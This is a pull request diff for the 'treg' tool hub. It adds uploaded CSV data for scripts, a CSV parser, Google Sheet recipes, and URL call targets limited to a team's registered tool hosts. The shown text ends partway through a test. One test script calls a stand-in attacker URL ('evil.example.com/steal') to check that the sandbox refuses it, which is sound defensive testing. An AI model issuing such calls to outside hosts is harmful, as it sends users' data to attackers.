### PR TITLE
feat(hub): 7.5 - the data scripts, the URL target, the uploaded CSV

### DIFF
--- a/docs/context/architecture/hub.md
+++ b/docs/context/architecture/hub.md
@@ -16,6 +16,9 @@ sources:
   - src/treg/worker.py
   - src/treg/web/index.html
   - src/treg/alembic/versions/0029_hubrun_output.py
+  - src/treg/alembic/versions/0030_hubtool_data.py
+  - docs/hub-recipes/data-sheets/run.js
+  - docs/hub-recipes/data-csv/run.js
   - src/treg/routers/web.py
   - src/treg/web/skill.md
   - src/treg/web/llms.txt
@@ -302,3 +305,21 @@ the trace and the output (`HubRun.output`, migration 0029, stored for successful
 MAKER's team with the inputs (secret inputs masked), the trace, the script's log and the full
 error; a caller's error carries the failing step's name and status, never the upstream body;
 any other team gets 404.
+
+## The data scripts, the URL target, the uploaded CSV (phase 7.5)
+
+Two more things a script gets. `ctx.csv(text)` parses CSV (RFC 4180: quotes, doubled quotes,
+newlines inside quotes) into rows keyed by the header, so a public Google Sheet is one call
+away: the team registers `sheets` as an own tool with base URL `https://docs.google.com` and no
+secret, and the script calls `sheets/spreadsheets/d/<id>/export?format=csv&gid=<gid>`
+(`docs/hub-recipes/data-sheets`). `ctx.data` is the rows of the **fifth file**, `data.csv`,
+uploaded with the version (`HubTool.data`, migration 0030; at most 50 MB, a header and at least
+one row, read-only; a replacement is a new version), parsed once per run in the parent so the
+engine gets JSON (`docs/hub-recipes/data-csv`). A script that serves only its data may have an
+empty `uses`; a steps recipe still must name at least one tool.
+
+The third target shape of round 2: a full URL in `ctx.call` resolves to `<tool>/<path>` when it
+starts with the base URL of an own tool named in `uses` (the URL's query merges under the
+call's), and is refused for any other host. This is also the answer to "my script needs my own
+server": the server is an own tool (`treg tool add my-api --base-url https://api.mine.com`,
+secret optional); treg makes the request; the sandbox never opens a socket.

--- a/docs/hub-recipes/data-csv/README.md
+++ b/docs/hub-recipes/data-csv/README.md
@@ -1,0 +1,7 @@
+# csv-rows
+
+Serves the rows of the CSV uploaded with this tool. Filter with `column` + `equals`, or search
+every cell with `search`; `limit` up to 100. The data is read-only; to change it, replace
+`data.csv` and publish again (a new version).
+
+`uses` is empty: this script calls no tool at all, only its own data.

--- a/docs/hub-recipes/data-csv/check.json
+++ b/docs/hub-recipes/data-csv/check.json
@@ -1,0 +1,5 @@
+{
+  "inputs": {"limit": 3},
+  "fields": ["rows", "count"],
+  "min_rows": 1
+}

--- a/docs/hub-recipes/data-csv/data.csv
+++ b/docs/hub-recipes/data-csv/data.csv
@@ -1,0 +1,6 @@
+company,country,plan,seats
+Figma,us,enterprise,1200
+Notion,us,team,340
+Linear,us,team,85
+Supabase,sg,enterprise,210
+Canva,au,team,990

--- a/docs/hub-recipes/data-csv/recipe.json
+++ b/docs/hub-recipes/data-csv/recipe.json
@@ -1,0 +1,14 @@
+{
+  "name": "csv-rows",
+  "summary": "Rows of the CSV I uploaded with this tool, filtered by one column and a search word.",
+  "inputs": {
+    "column": {"type": "string", "default": "", "note": "a column name to filter on"},
+    "equals": {"type": "string", "default": "", "note": "keep rows where `column` equals this"},
+    "search": {"type": "string", "default": "", "note": "keep rows where any cell contains this"},
+    "limit":  {"type": "int", "default": 20, "max": 100}
+  },
+  "uses": [],
+  "script": "run.js",
+  "output": {"fields": ["rows", "count"]},
+  "price_usd": 0.005
+}

--- a/docs/hub-recipes/data-csv/run.js
+++ b/docs/hub-recipes/data-csv/run.js
@@ -1,0 +1,14 @@
+// The maker's data travels WITH the tool: `data.csv` beside these files is uploaded at publish
+// (at most 50 MB, read-only; replace it and publish again for a new version). The script reads
+// it as ctx.data, already parsed into objects keyed by the header row. No tool, no key, no call.
+export default async function run(ctx) {
+  const { column, equals, search, limit } = ctx.inputs;
+  let rows = ctx.data || [];
+  if (column && equals) rows = rows.filter(row => String(row[column] ?? "") === equals);
+  if (search) {
+    const needle = search.toLowerCase();
+    rows = rows.filter(row => Object.values(row).some(v => String(v).toLowerCase().includes(needle)));
+  }
+  ctx.log(rows.length + " of " + (ctx.data || []).length + " rows matched");
+  return { rows: rows.slice(0, limit), count: rows.length };
+}

--- a/docs/hub-recipes/data-sheets/README.md
+++ b/docs/hub-recipes/data-sheets/README.md
@@ -1,0 +1,9 @@
+# sheet-rows
+
+Serves the rows of a public Google Sheet as a tool. Give the sheet's id (from its URL) and, if
+needed, the tab's `gid`. Filter with `column` + `equals`, or search every cell with `search`;
+`limit` up to 100. The sheet must be shared as "anyone with the link"; private sheets are not
+supported in this version.
+
+Before publishing: `treg tool add sheets --base-url https://docs.google.com` (no secret), then
+list `sheets` in `uses`.

--- a/docs/hub-recipes/data-sheets/check.json
+++ b/docs/hub-recipes/data-sheets/check.json
@@ -1,0 +1,5 @@
+{
+  "inputs": {"sheet_id": "1BxiMVs0XRA5nFMdKvBdBZjgmUUqptlbs74OgvE2upms", "limit": 3},
+  "fields": ["rows", "count"],
+  "min_rows": 1
+}

--- a/docs/hub-recipes/data-sheets/recipe.json
+++ b/docs/hub-recipes/data-sheets/recipe.json
@@ -1,0 +1,16 @@
+{
+  "name": "sheet-rows",
+  "summary": "Rows of a public Google Sheet, filtered by one column and a search word. Public-by-link sheets only.",
+  "inputs": {
+    "sheet_id": {"type": "string", "example": "1BxiMVs0XRA5nFMdKvBdBZjgmUUqptlbs74OgvE2upms", "note": "the id in the sheet's URL"},
+    "gid":      {"type": "string", "default": "0", "note": "the tab id; 0 is the first tab"},
+    "column":   {"type": "string", "default": "", "note": "a column name to filter on"},
+    "equals":   {"type": "string", "default": "", "note": "keep rows where `column` equals this"},
+    "search":   {"type": "string", "default": "", "note": "keep rows where any cell contains this"},
+    "limit":    {"type": "int", "default": 20, "max": 100}
+  },
+  "uses": ["sheets"],
+  "script": "run.js",
+  "output": {"fields": ["rows", "count"]},
+  "price_usd": 0
+}

--- a/docs/hub-recipes/data-sheets/run.js
+++ b/docs/hub-recipes/data-sheets/run.js
@@ -1,0 +1,20 @@
+// A PUBLIC Google Sheet (File → Share → Anyone with the link) exports as CSV at
+//   https://docs.google.com/spreadsheets/d/<sheet_id>/export?format=csv&gid=<gid>
+// The team registers that host once as its own tool, with no secret:
+//   treg tool add sheets --base-url https://docs.google.com
+// and lists "sheets" in `uses`. The script names the tool; treg makes the request.
+export default async function run(ctx) {
+  const { sheet_id, gid, column, equals, search, limit } = ctx.inputs;
+  const r = await ctx.call("sheets/spreadsheets/d/" + sheet_id + "/export", {
+    query: { format: "csv", gid: String(gid) },
+  });
+  if (r.status !== 200) throw new Error("the sheet answered " + r.status + " (is it shared as 'anyone with the link'?)");
+  let rows = ctx.csv(r.text);                       // objects keyed by the header row
+  if (column && equals) rows = rows.filter(row => String(row[column] ?? "") === equals);
+  if (search) {
+    const needle = search.toLowerCase();
+    rows = rows.filter(row => Object.values(row).some(v => String(v).toLowerCase().includes(needle)));
+  }
+  ctx.log(rows.length + " rows matched; returning " + Math.min(rows.length, limit));
+  return { rows: rows.slice(0, limit), count: rows.length };
+}

--- a/src/treg/alembic/versions/0030_hubtool_data.py
+++ b/src/treg/alembic/versions/0030_hubtool_data.py
@@ -1,0 +1,26 @@
+"""hubtool.data — the maker's uploaded CSV (docs/HUB-DECISIONS.md round 1 q6)
+
+Revision ID: 0030
+Revises: 0029
+Create Date: 2026-09-10
+
+One nullable text column: a metadata-only ALTER on Postgres.
+"""
+from collections.abc import Sequence
+
+import sqlalchemy as sa
+from alembic import op
+
+revision: str = "0030"
+down_revision: str | Sequence[str] | None = "0029"
+branch_labels: str | Sequence[str] | None = None
+depends_on: str | Sequence[str] | None = None
+
+
+def upgrade() -> None:
+    op.add_column("hubtool", sa.Column("data", sa.String(), nullable=True))
+
+
+def downgrade() -> None:
+    with op.batch_alter_table("hubtool") as batch:
+        batch.drop_column("data")

--- a/src/treg/application/hub/__init__.py
+++ b/src/treg/application/hub/__init__.py
@@ -89,9 +89,35 @@ class Published:
     kind: str
 
 
+MAX_DATA_BYTES = 50_000_000
+
+
+def validate_data(data: Any) -> str | None:
+    """The uploaded CSV: text, at most 50 MB, a header row and at least one data row, parseable."""
+    import csv
+    import io
+    if data is None or data == "":
+        return None
+    if not isinstance(data, str):
+        raise ManifestError("data", "the CSV as text (the contents of data.csv)")
+    if len(data.encode("utf-8")) > MAX_DATA_BYTES:
+        raise ManifestError("data", "at most 50 MB")
+    try:
+        reader = csv.reader(io.StringIO(data))
+        header = next(reader, None)
+        first = next(reader, None)
+    except csv.Error as exc:
+        raise ManifestError("data", f"not valid CSV: {exc}") from None
+    if not header or not any(h.strip() for h in header):
+        raise ManifestError("data", "the first row must be the header (column names)")
+    if first is None:
+        raise ManifestError("data", "at least one data row under the header")
+    return data
+
+
 async def publish(
     db: AsyncSession, *, org: Org, maker_email: str,
-    manifest: Any, script: str | None, check: Any, readme: Any,
+    manifest: Any, script: str | None, check: Any, readme: Any, data: Any = None,
 ) -> Published:
     """Validate the four files against this team's world and store one version. Raises
     ManifestError with field + rule; the HTTP layer turns it into a 422 the maker's agent can act
@@ -115,6 +141,9 @@ async def publish(
     output_fields = (v.output["fields"] if v.kind == "script" else list(v.output))
     check_v = validate_check(check, v.inputs, output_fields)
     readme_v = validate_readme(readme)
+    data_v = validate_data(data)
+    if data_v is not None and v.kind != "script":
+        raise ManifestError("data", "an uploaded CSV is read by a script (ctx.data); a steps recipe has no reader for it")
 
     tool_id = f"{org.slug}.{v.name}"
     newest = (await db.execute(
@@ -125,7 +154,7 @@ async def publish(
         org_id=org.id, tool_id=tool_id, name=v.name, version=version, kind=v.kind,
         status="checking", summary=v.summary, writes=v.writes, price_micro=v.price_micro,
         manifest={**v.manifest, "version": version}, script=script if v.kind == "script" else None,
-        check=check_v, readme=readme_v, created_by=maker_email,
+        check=check_v, readme=readme_v, created_by=maker_email, data=data_v,
     )
     db.add(row)
     await db.flush()
@@ -171,11 +200,13 @@ def view(row: HubTool) -> dict[str, Any]:
         "output": row.manifest.get("output", {}), "limits": row.manifest.get("limits", {}),
         "created_by": row.created_by, "created_at": row.created_at.isoformat(),
         "check_result": row.check_result,
+        "data": ({"rows": max(0, (row.data.count("\n") + (0 if row.data.endswith("\n") else 1)) - 1),
+                  "bytes": len(row.data.encode("utf-8"))} if row.data else None),
     }
 
 
 async def transient(db: AsyncSession, *, org: Org, maker_email: str,
-                    manifest: Any, script: str | None, check: Any, readme: Any) -> HubTool:
+                    manifest: Any, script: str | None, check: Any, readme: Any, data: Any = None) -> HubTool:
     """The same validation as publish(), but the row is NOT added to the session: a dry run of a
     folder from the maker's machine. Version 0 marks it in every trace."""
     own_tools = {name for (name,) in (await db.execute(select(Tool.name).where(Tool.org_id == org.id))).all()}
@@ -186,10 +217,11 @@ async def transient(db: AsyncSession, *, org: Org, maker_email: str,
     output_fields = (v.output["fields"] if v.kind == "script" else list(v.output))
     validate_check(check, v.inputs, output_fields)
     validate_readme(readme)
+    data_v = validate_data(data)
     return HubTool(org_id=org.id, tool_id=f"{org.slug}.{v.name}", name=v.name, version=0, kind=v.kind,
                    status="dry-run", summary=v.summary, writes=v.writes, price_micro=v.price_micro,
                    manifest={**v.manifest, "version": 0}, script=script if v.kind == "script" else None,
-                   check=check, readme=readme, created_by=maker_email)
+                   check=check, readme=readme, created_by=maker_email, data=data_v)
 
 
 async def retire(db: AsyncSession, *, org_id: int, tool_id: str) -> int:

--- a/src/treg/application/hub/runner.py
+++ b/src/treg/application/hub/runner.py
@@ -23,6 +23,7 @@ from typing import Any, Callable
 from urllib.parse import urlencode
 
 import httpx
+from sqlalchemy import select
 
 from ... import audit
 from ...domain.catalog import store as catalog_store
@@ -537,12 +538,34 @@ async def _run_script_road(parent, tool, inputs, ceiling, maker, catalog, own_to
         usd = (cv or {}).get("usd")
         return int(round(float(usd) * 1_000_000)) if usd else 0
 
+    # The maker's own tools named in `uses`, with their base URLs: a full URL in ctx.call resolves
+    # to `<tool>/<path>` when it starts with one of them (HUB-DECISIONS round 2 q2, the third
+    # target shape), and is refused for any other host - the sandbox never reaches a host the
+    # manifest did not name.
+    bases: dict[str, str] = {}
+    if own_tools:
+        from ...models import Tool
+        async with session_maker() as s:
+            rows = (await s.execute(select(Tool.name, Tool.base_url).where(
+                Tool.org_id == tool.org_id, Tool.name.in_(own_tools)))).all()
+        bases = {name: (base or "").rstrip("/") for name, base in rows}
+
+    def from_url(url: str) -> tuple[str, dict[str, str]]:
+        from urllib.parse import parse_qsl, urlsplit
+        for name, base in sorted(bases.items(), key=lambda kv: -len(kv[1])):
+            if base and (url == base or url.startswith(base + "/") or url.startswith(base + "?")):
+                rest = url[len(base):]
+                u = urlsplit(rest if rest.startswith("/") else "/" + rest)
+                return f"{name}{u.path}", dict(parse_qsl(u.query, keep_blank_values=True))
+        raise sandbox.SandboxError("refused", f"{url!r} is not under a tool in `uses`; register the host as a tool and name it")
+
     async def execute(req: sandbox.CallRequest) -> dict[str, Any]:
         nonlocal spent, counted
         call = req.target
+        url_query: dict[str, str] = {}
+        if call.startswith("http://") or call.startswith("https://"):
+            call, url_query = from_url(call)
         target = call.split("/", 1)[0]
-        if call.startswith("http"):
-            raise sandbox.SandboxError("refused", "a script calls a catalog id or one of the team's tools by name, never a URL")
         if not (call in uses or (target in own_tools and "/" in call) or target in uses and target in own_tools):
             raise sandbox.SandboxError("refused", f"{call!r} is not in the manifest's `uses`")
         if target not in own_tools and call not in catalog.by_id:
@@ -557,7 +580,7 @@ async def _run_script_road(parent, tool, inputs, ceiling, maker, catalog, own_to
         opts = req.opts
         ep = None if target in own_tools else catalog.by_id.get(call)
         method = str(opts.get("method") or (ep["method"] if ep else "GET")).upper()
-        query = opts.get("query") if isinstance(opts.get("query"), dict) else {}
+        query = {**url_query, **(opts.get("query") if isinstance(opts.get("query"), dict) else {})}
         body = opts.get("body")
         inp = body if (isinstance(body, dict) and method in ("POST", "PUT", "PATCH")) else query
         if method in ("POST", "PUT", "PATCH") and not isinstance(inp, dict):
@@ -600,9 +623,10 @@ async def _run_script_road(parent, tool, inputs, ceiling, maker, catalog, own_to
         return {"status": response.status, "headers": headers, "json": doc,
                 "text": raw[:MAX_TEXT].decode("utf-8", "replace")}
 
+    data_rows = _csv_rows(tool.data) if getattr(tool, "data", None) else None
     try:
         output = await sandbox.run_script(tool.script or "", inputs, wall_s=manifest["limits"]["wall_s"],
-                                          execute=execute, log=log)
+                                          execute=execute, log=log, data=data_rows)
     except sandbox.SandboxError as exc:
         ms_total = int((time.monotonic() - started) * 1000)
         await _close_price(tool, run_id, price_held, success=False, reason="hub_script_failed")
@@ -636,3 +660,12 @@ async def _run_script_road(parent, tool, inputs, ceiling, maker, catalog, own_to
 
 
 MAX_TEXT = 1_000_000
+
+
+def _csv_rows(text: str) -> list[dict[str, str]]:
+    """The uploaded CSV as rows keyed by its header row, parsed once per run in the parent so the
+    engine gets JSON, never a parser to write."""
+    import csv
+    import io
+    reader = csv.DictReader(io.StringIO(text))
+    return [dict(r) for r in reader]

--- a/src/treg/application/hub/sandbox.py
+++ b/src/treg/application/hub/sandbox.py
@@ -100,7 +100,7 @@ def _kill_group(pgid: int) -> None:
 
 async def run_script(
     script: str, inputs: dict[str, Any], *, wall_s: int, execute: CallExecutor,
-    log: list[str],
+    log: list[str], data: list[dict[str, Any]] | None = None,
 ) -> dict[str, Any]:
     """Run one script to its output. `execute` runs each ctx.call; `log` receives the script's
     lines. Raises SandboxError when the run cannot produce an output."""
@@ -115,7 +115,7 @@ async def run_script(
     assert proc.stdin and proc.stdout and proc.stderr
     calls = 0
     try:
-        proc.stdin.write((json.dumps({"op": "run", "script": script, "inputs": inputs,
+        proc.stdin.write((json.dumps({"op": "run", "script": script, "inputs": inputs, "data": data,
                                       "memory_mb": MEMORY_MB, "wall_s": wall_s},
                                      ensure_ascii=False) + "\n").encode())
         await proc.stdin.drain()

--- a/src/treg/cli.py
+++ b/src/treg/cli.py
@@ -5003,7 +5003,7 @@ def cmd_feedback(args, cfg) -> None:
 
 # ---- the tool hub: tools made of tools (docs/HUB-DECISIONS.md) --------------------------------
 
-HUB_FILES = ("recipe.json", "run.js", "check.json", "README.md")
+HUB_FILES = ("recipe.json", "run.js", "check.json", "README.md", "data.csv")
 
 _HUB_STEPS_SKELETON = {
     "name": None,
@@ -5064,6 +5064,8 @@ def _hub_read_folder(path: str) -> dict:
         body["readme"] = (folder / "README.md").read_text()
     if (folder / "run.js").is_file():
         body["script"] = (folder / "run.js").read_text()
+    if (folder / "data.csv").is_file():
+        body["data"] = (folder / "data.csv").read_text()    # the maker's uploaded CSV: ctx.data in the script
     return body
 
 

--- a/src/treg/domain/hub/manifest.py
+++ b/src/treg/domain/hub/manifest.py
@@ -115,14 +115,14 @@ def validate(
         raise _fail("writes", "true or false")
 
     inputs = _validate_inputs(raw.get("inputs", {}))
-    uses = _validate_uses(raw.get("uses"), catalog_ids, own_tools, hub_ids)
-    limits = _validate_limits(raw.get("limits", {}))
-    price_micro = _validate_price(raw.get("price_usd", 0))
-
     has_steps, has_script = "steps" in raw, "script" in raw
     if has_steps == has_script:
         raise _fail("steps", "exactly one of `steps` or `script` (found "
                     + ("both" if has_steps else "neither") + ")")
+    # A script may use nothing: a tool that serves its uploaded CSV (ctx.data) makes no call.
+    uses = _validate_uses(raw.get("uses", []), catalog_ids, own_tools, hub_ids, allow_empty=has_script)
+    limits = _validate_limits(raw.get("limits", {}))
+    price_micro = _validate_price(raw.get("price_usd", 0))
 
     if has_script:
         kind = "script"
@@ -197,8 +197,8 @@ def _validate_inputs(raw: Any) -> dict[str, dict[str, Any]]:
 
 
 def _validate_uses(raw: Any, catalog_ids: set[str], own_tools: set[str],
-                   hub_ids: frozenset[str] | set[str]) -> list[str]:
-    if not isinstance(raw, list) or not raw:
+                   hub_ids: frozenset[str] | set[str], allow_empty: bool = False) -> list[str]:
+    if not isinstance(raw, list) or (not raw and not allow_empty):
         raise _fail("uses", "a non-empty list of the tools this recipe may call")
     if len(raw) > MAX_USES:
         raise _fail("uses", f"at most {MAX_USES} entries")

--- a/src/treg/hub_sandbox.py
+++ b/src/treg/hub_sandbox.py
@@ -7,7 +7,7 @@ the call through treg's own call path. This file imports nothing from the server
 with a scrubbed environment and must stay that small.
 
 Protocol, JSON lines, one per message:
-  parent → child   {"op": "run", "script": "...", "inputs": {...}, "memory_mb": 64, "wall_s": 120}
+  parent → child   {"op": "run", "script": "...", "inputs": {...}, "data": [rows] | null, "memory_mb": 64, "wall_s": 120}
   child  → parent  {"op": "call", "id": 1, "target": "...", "opts": {...}}
   parent → child   {"op": "result", "id": 1, "status": 200, "headers": {...}, "json": ..., "text": "..."}
                    {"op": "refused", "id": 1, "error": "..."}      (the script sees a thrown Error)
@@ -31,13 +31,38 @@ _EXPORT = re.compile(r"^\s*export\s+default\s+", re.M)
 
 PRELUDE = """
 globalThis.__logs = [];
+// ctx.csv(text): RFC 4180 in 30 lines - quotes, doubled quotes, commas and newlines inside
+// quotes, CRLF. The first row is the header; every other row becomes an object keyed by it.
+function __csv(text) {
+  const rows = []; let row = [], field = "", q = false, i = 0; const s = String(text);
+  while (i < s.length) {
+    const c = s[i];
+    if (q) {
+      if (c === '"') { if (s[i + 1] === '"') { field += '"'; i += 2; continue; } q = false; i++; continue; }
+      field += c; i++; continue;
+    }
+    if (c === '"') { q = true; i++; continue; }
+    if (c === ",") { row.push(field); field = ""; i++; continue; }
+    if (c === "\\r") { i++; continue; }
+    if (c === "\\n") { row.push(field); rows.push(row); row = []; field = ""; i++; continue; }
+    field += c; i++;
+  }
+  if (field !== "" || row.length) { row.push(field); rows.push(row); }
+  if (!rows.length) return [];
+  const head = rows[0].map(h => h.trim());
+  return rows.slice(1).filter(r => r.length > 1 || (r.length === 1 && r[0] !== "")).map(r => {
+    const o = {}; head.forEach((h, k) => { o[h] = r[k] === undefined ? "" : r[k]; }); return o;
+  });
+}
 globalThis.ctx = {
   inputs: JSON.parse(__inputs_json),
+  data: JSON.parse(__data_json),
   call: async function (target, opts) {
     const reply = JSON.parse(__bridge_call(JSON.stringify([String(target), opts || {}])));
     if (reply.op === "refused") { throw new Error(reply.error); }
     return { status: reply.status, headers: reply.headers, json: reply.json, text: reply.text };
   },
+  csv: __csv,
   log: function (text) { __bridge_log(String(text)); },
 };
 """
@@ -95,6 +120,7 @@ def main() -> int:
     ctx.add_callable("__bridge_call", bridge_call)
     ctx.add_callable("__bridge_log", bridge_log)
     ctx.set("__inputs_json", json.dumps(start.get("inputs", {}), ensure_ascii=False))
+    ctx.set("__data_json", json.dumps(start.get("data"), ensure_ascii=False))   # the uploaded CSV's rows, or null
     try:
         ctx.eval(PRELUDE)
         ctx.eval(script)

--- a/src/treg/models.py
+++ b/src/treg/models.py
@@ -1177,6 +1177,10 @@ class HubTool(SQLModel, table=True):
     # The check run's verdict (docs/HUB-DECISIONS.md round 2 q10): {status, run_id, checked_at,
     # error?, trace?}. Declared LAST to match the migration's ALTER TABLE append position.
     check_result: dict | None = Field(default=None, sa_column=Column(JSON, nullable=True))
+    # The maker's uploaded CSV (docs/HUB-DECISIONS.md round 1 q6): at most 50 MB, read-only after
+    # upload, a replacement is a new version; the script reads it as ctx.data. Declared LAST
+    # (migration 0030).
+    data: str | None = Field(default=None)
 
 
 class HubRun(SQLModel, table=True):

--- a/src/treg/routers/hub.py
+++ b/src/treg/routers/hub.py
@@ -42,6 +42,7 @@ class PublishIn(BaseModel):
     script: str | None = Field(default=None, max_length=200_000)
     check: dict[str, Any]
     readme: str = Field(min_length=1, max_length=4000)
+    data: str | None = Field(default=None, max_length=50_000_000)   # data.csv, read by the script as ctx.data
 
 
 async def _publish(body: PublishIn, request: Request, caller: Caller, db: AsyncSession,
@@ -58,6 +59,7 @@ async def _publish(body: PublishIn, request: Request, caller: Caller, db: AsyncS
         published = await hub_app.publish(
             db, org=caller.org, maker_email=caller.email,
             manifest=body.manifest, script=body.script, check=body.check, readme=body.readme,
+            data=body.data,
         )
     except ManifestError as exc:
         raise HTTPException(status_code=422, detail={
@@ -224,7 +226,7 @@ async def run_hub_folder(
     try:
         row = await hub_app.transient(db, org=caller.org, maker_email=caller.email,
                                       manifest=body.manifest, script=body.script,
-                                      check=body.check, readme=body.readme)
+                                      check=body.check, readme=body.readme, data=body.data)
     except ManifestError as exc:
         raise HTTPException(status_code=422, detail={
             "error": "manifest_invalid", "field": exc.field, "rule": exc.rule}) from None

--- a/src/treg/routers/web.py
+++ b/src/treg/routers/web.py
@@ -2188,6 +2188,7 @@ curl -X POST {e(base)}/call/{e(row.tool_id)} \\
   <ul class="facts">
     <li>made of {len(m.get('uses', []))} tool(s) <span class="muted">(catalog tools and the maker's own; names and keys hidden)</span></li>
     <li>{e(kind)} · {caps.get('wall_s', 120)} s · {caps.get('steps', 20)} calls max</li>
+    {('<li>data uploaded with the tool: ' + str(max(0, row.data.count(chr(10)) + (0 if row.data.endswith(chr(10)) else 1) - 1)) + ' rows</li>') if getattr(row, 'data', None) else ''}
     <li>Reliability, 30 days: {rel['runs']} runs by others{(' · ' + str(rel['ok_pct']) + '% ok · ' + str(rel['median_ms']) + ' ms median') if rel['runs'] else ''}</li>
     {('<li>Older versions: <ul>' + older_html + '</ul></li>') if older_html else ''}
   </ul>

--- a/src/treg/web/index.html
+++ b/src/treg/web/index.html
@@ -2892,6 +2892,8 @@ product, including per-customer usage tracking and billing.</pre>
               <p class="sub"><code v-for="u in hub.tool.uses" :key="u" style="margin-right:8px">{{u}}</code></p>
               <div class="lbl">Output</div>
               <p class="sub"><code>{{(hub.tool.output&&hub.tool.output.fields)?hub.tool.output.fields.join(', '):Object.keys(hub.tool.output||{}).join(', ')}}</code></p>
+              <template v-if="hub.tool.data"><div class="lbl">Data</div>
+              <p class="sub">{{hub.tool.data.rows.toLocaleString()}} rows · {{(hub.tool.data.bytes/1024).toFixed(0)}} KB uploaded with this version (read-only; replace data.csv and publish for a new version)</p></template>
               <div class="lbl">Call it</div>
               <pre style="white-space:pre-wrap;word-break:break-all">{{hubCallLine(hub.tool)}}
 POST {{proxy}}/call/{{hub.tool.tool_id}}    X-Treg-Token · JSON body of inputs</pre>

--- a/src/treg/web/llms.txt
+++ b/src/treg/web/llms.txt
@@ -366,9 +366,12 @@ listed in search; the maker shares the id or the page `{BASE}/hub/<id>` (`.md` f
   README.md); `treg hub run . --input k=v` runs the folder for real, nothing stored; `treg hub
   publish .` validates, runs check.json once on your balance, and the tool is live on pass. Over
   MCP: `hub_create`, `hub_update`, `hub_mine`.
-- A script gets `ctx.inputs`, `ctx.call(target, {method, query, body, headers})` and `ctx.log`;
-  no network, no files, no `require`. `target` must be in the manifest's `uses`: a catalog id or one
-  of the team's own tools as `<tool>/<path>`. Caps: 120 s, 20 calls, 64 MB, four runs at a time.
+- A script gets `ctx.inputs`, `ctx.call(target, {method, query, body, headers})`, `ctx.csv(text)`,
+  `ctx.data` (the rows of the `data.csv` uploaded with the tool, ≤ 50 MB, read-only) and `ctx.log`;
+  no network, no files, no `require`. `target` must be in the manifest's `uses`: a catalog id, one
+  of the team's own tools as `<tool>/<path>`, or a full URL under that tool's base URL. Your own
+  server or a public Google Sheet is a tool too: `treg tool add my-api --base-url https://…`
+  (secret optional), then name it. Caps: 120 s, 20 calls, 64 MB, four runs at a time.
 - **Never paste a credential into a script.** Register it first (`treg secret add`, `treg tool
   add`), list the tool in `uses`, name it in `ctx.call`. The script never sees the key.
 - Read any hub tool's contract with `GET {BASE}/catalog/endpoints/<id>` (`catalog_get`,

--- a/src/treg/web/skill.md
+++ b/src/treg/web/skill.md
@@ -228,9 +228,14 @@ treg tool add supabase --base-url https://<ref>.supabase.co \
 ```
 
 **What a script gets — the whole surface:** `ctx.inputs` (checked against the manifest),
-`ctx.call(target, {method, query, body, headers})` → `{status, headers, json, text}`, and
-`ctx.log(text)`. No network, no files, no `require`; `ctx.call` is the only road out, and `target`
-must be in the manifest's `uses`: a catalog id, or one of the team's own tools as `<tool>/<path>`.
+`ctx.call(target, {method, query, body, headers})` → `{status, headers, json, text}`,
+`ctx.csv(text)` → rows keyed by the header, `ctx.data` → the rows of the `data.csv` uploaded with
+the tool (a fifth file, ≤ 50 MB, read-only; replace it and publish again), and `ctx.log(text)`.
+No network, no files, no `require`; `ctx.call` is the only road out, and `target` must be in the
+manifest's `uses`: a catalog id, one of the team's own tools as `<tool>/<path>`, or a full URL
+under such a tool's base URL. **Your own server is a tool:** `treg tool add my-api --base-url
+https://api.mine.com` (a secret is optional; a public Google Sheet needs none), list `my-api` in
+`uses`, then `ctx.call("my-api/v1/things")`. treg makes the request; the sandbox never opens a socket.
 Caps: 120 s, 20 calls, 64 MB, four runs at a time per team. A steps recipe instead names its calls in
 `steps` and reads earlier answers with references (`$input.x`, `$step.path`, `$step[]`,
 `$step.length`); steps that do not depend on each other run four at a time.

--- a/tests/callmatrix/test_hub_run.py
+++ b/tests/callmatrix/test_hub_run.py
@@ -504,3 +504,81 @@ async def test_the_earnings_report_counts_runs_and_credit_never_callers(
     assert csv.headers["content-type"].startswith("text/csv") and csv.text.startswith("day,runs,ok,failed,earned_usd")
     # another team cannot read it
     assert (await matrix_clients.get(f"/hub/tools/{tool_id}/earnings", headers=caller_h)).status_code == 404
+
+
+# ---------------------------------------------------------------------------------------------
+# Phase 7.5: the URL target, the public sheet, the uploaded CSV
+
+async def test_a_full_url_under_an_own_tool_in_uses_is_allowed_and_any_other_host_is_refused(
+    matrix_clients: AsyncClient, fake_provider: FakeProvider, platform_on, hub_on,
+):
+    sid = (await matrix_clients.post("/secrets", json={"name": "k", "value": "MY-KEY"})).json()["id"]
+    await matrix_clients.post("/tools", json={"name": "my-api", "base_url": "https://fake-provider.invalid/api", "secret_id": sid})
+    tool_id = await _publish_script(matrix_clients, """
+export default async function run(ctx) {
+  const r = await ctx.call("https://fake-provider.invalid/api/v1/things?page=2", { query: { size: "5" } });
+  return { path: r.status };
+}""", ["my-api"], ["path"])
+    r = await matrix_clients.post(f"/call/{tool_id}", json={"domain": "x"}, headers=FAKE)
+    assert r.status_code == 200, r.text
+    hit = fake_provider.hits[-1]
+    assert hit.path == "/api/v1/things" and set(hit.query) >= {("page", "2"), ("size", "5")}
+    assert hit.headers["authorization"] == "Bearer MY-KEY"
+    # another host, even a real one, is refused and the run stops
+    tool2 = await _publish_script(matrix_clients, """
+export default async function run(ctx) {
+  await ctx.call("https://evil.example.com/steal", {});
+  return { path: 1 };
+}""", ["my-api"], ["path"])
+    r2 = await matrix_clients.post(f"/call/{tool2}", json={"domain": "x"}, headers=FAKE)
+    assert r2.status_code == 424 and "not under a tool in `uses`" in r2.json()["detail"]["message"]
+
+
+async def test_the_public_sheet_recipe_runs_on_a_secretless_tool(
+    matrix_clients: AsyncClient, fake_provider: FakeProvider, platform_on, hub_on, monkeypatch,
+):
+    import json as _json
+    from pathlib import Path
+    folder = Path(__file__).resolve().parents[2] / "docs" / "hub-recipes" / "data-sheets"
+    r = await matrix_clients.post("/tools", json={"name": "sheets", "base_url": "https://fake-provider.invalid"})
+    assert r.status_code in (200, 201), r.text          # a public sheet needs no secret
+    # the check run is an in-process request under the maker's identity: it carries no X-Fake-*
+    # header, so the "sheet" answers from a fixed body for this test
+    sheet = b"company,country\nFigma,us\nCanva,au\nNotion,us\n"
+    monkeypatch.setattr(FakeProvider, "_response_body", staticmethod(lambda request, headers: sheet))
+    manifest = _json.loads((folder / "recipe.json").read_text())
+    pub = await matrix_clients.post("/hub/tools", json={
+        "manifest": manifest, "script": (folder / "run.js").read_text(),
+        "check": _json.loads((folder / "check.json").read_text()), "readme": (folder / "README.md").read_text()})
+    assert pub.status_code == 201 and pub.json()["status"] == "live", pub.text
+    r = await matrix_clients.post(f"/call/{pub.json()['tool_id']}",
+                                  json={"sheet_id": "abc", "column": "country", "equals": "us"})
